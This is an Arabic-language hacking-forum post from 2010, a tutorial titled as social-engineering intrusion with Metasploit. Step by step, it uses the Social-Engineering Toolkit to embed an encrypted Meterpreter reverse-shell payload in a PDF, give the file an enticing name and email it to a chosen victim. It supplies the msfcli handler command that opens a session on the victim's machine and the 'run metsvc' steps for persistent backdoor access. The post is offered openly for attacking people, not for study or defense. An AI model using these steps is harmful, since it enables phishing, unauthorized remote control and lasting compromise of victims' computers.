منتديات اجيلجلي العامة
عزيزي الزائر /عزيزتي الزائره

يرجى التكرم بتسجيل الدخول اذا كنت عضوا معنا او التسجيل

ان لم تكن عضو وترغب في الانضمام الى اسرة المنتدى سنتشرف بتسجيللك معنا

مع تحيات ادارة المنتدى
منتديات اجيلجلي العامة
عزيزي الزائر /عزيزتي الزائره

يرجى التكرم بتسجيل الدخول اذا كنت عضوا معنا او التسجيل

ان لم تكن عضو وترغب في الانضمام الى اسرة المنتدى سنتشرف بتسجيللك معنا

مع تحيات ادارة المنتدى
منتديات اجيلجلي العامة
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.


Mezo.me
 
الرئيسيةأحدث الصورالتسجيلدخولتسجيل دخول الاعضاء
إعلانات تجارية

    لا يوجد حالياً أي إعلان


    اعلانات قول

    منتديات اجيلجلي العامة :: منتدى الهكر :: اختراق البريد والاميلات
     

     الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية !

    		اذهب الى الأسفل 
    كاتب الموضوعرسالة
    igilgili


    igilgili


    الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية ! Dz10
    الولاية : JIJEL
    ذكر

    عدد المساهمات : 959

    النقاط : 2147494107

    التفيم : 0
    تاريخ التسجيل : 31/12/2009

    . ===============
    الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية ! E3lan1

    الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية ! Empty
    مُساهمةموضوع: الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية !   الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية ! Emptyالأحد 14 فبراير 2010 - 14:17


    بسم الله الرحمن الرحيم ..

    ..!

    اليوم بنتكلم عن الاختراق بالهندسة الاجتماعية ( Social Engineering ) و هي ما يعرف باقناع الضحية بما حوله من البيئة المحيطة به على الانترنت او ايا كان .. و لا يخفى على الجميع ان اشهر مهندس اجتماعي هو كيفين ميتنيك الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية ! Biggrin

    بحاول اني ما اخرج عن الموضوع .. ( باختصار هي التلاعب بالناس لفعل ما تريد لكي تحصل على ما تريد )

    بصراحة و بالنسبة لي .. تعتبر الهندسة الاجتماعية سلآح فتاك و خطير لانها لا تتوقف على اقفال ثغرة معينة او حماية للنظام و ما الى ذلك .. لانه بعد اقناع الضحية لا شيء يقف امام الوصول لما تريد .

    نرجع لموضوعنا ..

    كيف تتم العملية ؟

    1-عن طريق اداة من صناعة المبرمج ديفيد كنيدي ( مبرمج الفاست تراك )
    2-حقن بايلود مشفر من جميع الحمايات بكتاب الكتروني بصيغة pdf
    3-ارسال الملف لبريد الضحية على الانبوكس
    4-التنصت و الانتظار حتى يتم الاتصال بالضحية

    ماهي الادوات اللازمة للقيام بالعملية ؟


    1-Social-Engineering Toolkit
    2-Gmail account
    3-M3tasploit

    طبعا كل الادوات متوفرة على الباك تراك الا Social-Engineering Toolkit سوف نقوم بتحميلها و صنع مجلد لها

    نبدا مع اول امر وهو لتحميل الاداة و صنع مجلد لها

    كود:
    svn co [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] SET/
    ملاحظة : يجب ان تكون root ..

    صورة للتوضيح بعد تطبيق الامر و تكوين المجلد :

    [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]]

    الان ندخل على مجلد الاداة بالامر :
    كود:
    cd SET
    من ثم نشغل الادة عن طريق الامر :
    كود:
    ./set
    و هذي صورة توضيحية للامرين ..

    الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية ! 77377213

    اشرح لكم الخيارات ..

    الخيار رقم 1 لعمل هندسة اجتماعية عبر الايميل ..

    الخيار رقم 2 لعمل هندسة اجتماعية عبر صفحات الويب

    و الخيارات الباقية للتحديث و صنع بايلودات ..

    عموما هجومنا هو رقم 1 اللي يتم عن طريق الايميل ..

    نختار الخيار الاول بالرقم 1 و نشوف :

    الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية ! 84211353


    مثل ماهو واضح بالصورة .. طلع لنا خيارين ثانية نختار الخيار الاول بالرقم 1 ثم راح يسالك اذا تبي تكون بايلود او لا نختار نعم

    الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية ! 92585250

    الان ظهر لنا عدة خيارات لطريقة زرع البايلود اللي تبي تكونه داخل الكتاب الالتروني ..

    نختار رقم 4 لانه هو الفعال دائما .. اما الباقي فهو عن طريق ثغرات اي ان هناك احتمال بعدم نجاح العملية ..

    و بعد ما اخترنا الاستغلال المناسب .. الان نحدد البايلود المناسب و يفضل Meterpreter

    الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية ! 67450179

    بعد تحديد البايلود .. الان بيطلب منك الاي بي تبعك للاتصال بالضحية و بيطلب منك البورت اللي راح يتم التنصت عليه نحددها و نكمل شغلنا ..

    الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية ! 69706649

    الان اكتملت الاعدادات و تم صناعة الملف و البايلود بنجاح ..

    نضغط انتر لاستكمال العملية و ارسال الملف

    بيظهر لك خيارين .. الاول اذا كنت تبي تترك اسم الملف زي ماهو تختاره ..

    الثاني يقلك لا .. لازم اظهر بمظهر اكثر جاذبية للضحية

    طبعا اكيد نختار الخيار الثاني و نسمي الملف باسم جذاب ..


    الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية ! 10899339


    الان ايضا .. ظهر لنا خيارين جديدة الخيار الاول يعني ارسال الملف لايميل واحد فقط
    اما الخيار الثاني فهو لارسال الملف لعدة ايميلات !

    نختار الخيار الاول .. بالرقم 1 < انت بامكانك تختار الخيار الثاني

    بعد ما اخترنا الخيار الاول الان ظهرت لنا خيارات اخرى تفيد عنوان الرسالة و ما بداخلها

    طبعا يوجد اكثر من خيار .. بالنسبة لي انا اعجبتني الرسالة رقم 4 و انت اذا ما عجبك شيء بامكانك تكتب رسالة اخرى من تاليفك بالرقم 6

    الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية ! 67292319

    بعد ما حددنا الرسالة المطلوبة الان يطلب منا تحديد الايميل المراد استهدافه ..

    نحدده و نتبع الخيارات المتبقية ..

    الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية ! 61824142

    بعد ما تم تحديد ايميل الضحية .. طلب منا عنوان المرسل فاخترت عن طريق حساب gmail و ادخلت الحساب و الباسورد .. و من ثم طلب مني اذا كنت ابي اتنصت و لا لا و اخترت لا لاني بعد شوي راح اتنصت يدويا افضل ..

    الان تم ارسال الرسالة وش رايكم نشوف كيف شكلها ؟

    الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية ! 52218299

    حلوو .. واضحة الرسالة و الملف مرفق معها .. و بنفس عنوان الرسالة اللي اخترناه قبل شوي !

    طيب الان نتنصت لانتظار الضحية بالامر :
    كود:
    ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=5555 E
    الان نلاحظ الصورة بعد ما تنصتنا و بعد ما فتح الضحية الملف ظهور جلسة جديدة !

    الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية ! 46122813

    ================================================== =======================

    اضافة بسيطة و مفيدة جدا

    و هي ثبات الضحية و المقدرة للرجوع اليه في اي وقت تحبه .. وهو ما يعرف بالـ metsvc

    حلوو ..

    بعد ما وصلنا لجهاز الضحية مثل ماهو وآضح فوق راح ننفذ امر بسيط جدا لتثبيت خدمة الـ metsvc

    الامر :
    كود:
    run metsvc
    الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية ! 95635567

    الان بعد تنصيب الخدمة و في حال خروج الضحية ..

    تقدر ترجع للضحية بالامر التالي :
    كود:
    ./msfcli exploit/multi/handler PAYLOAD=windows/metsvc_bind_tcp LPORT=31337 RHOST=192.168.1.3 E
    بحيث RHOST= اي بي الضحية و LPORT= البورت تبع الخدمة وهو ثابت

    نلاحظ الصورة

    الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية ! 63626588

    الرجوع الى أعلى الصفحة اذهب الى الأسفل
    https://igilgili.yoo7.com
     
    الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية !
    		الرجوع الى أعلى الصفحة 
    صفحة 1 من اصل 1

    صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
    منتديات اجيلجلي العامة :: منتدى الهكر :: اختراق البريد والاميلات-
    انتقل الى:  
    ©phpBB | انشاء منتدى مع أحلى منتدى | منتدى مجاني للدعم و المساعدة | التبليغ عن محتوى مخالف | آخر المواضيع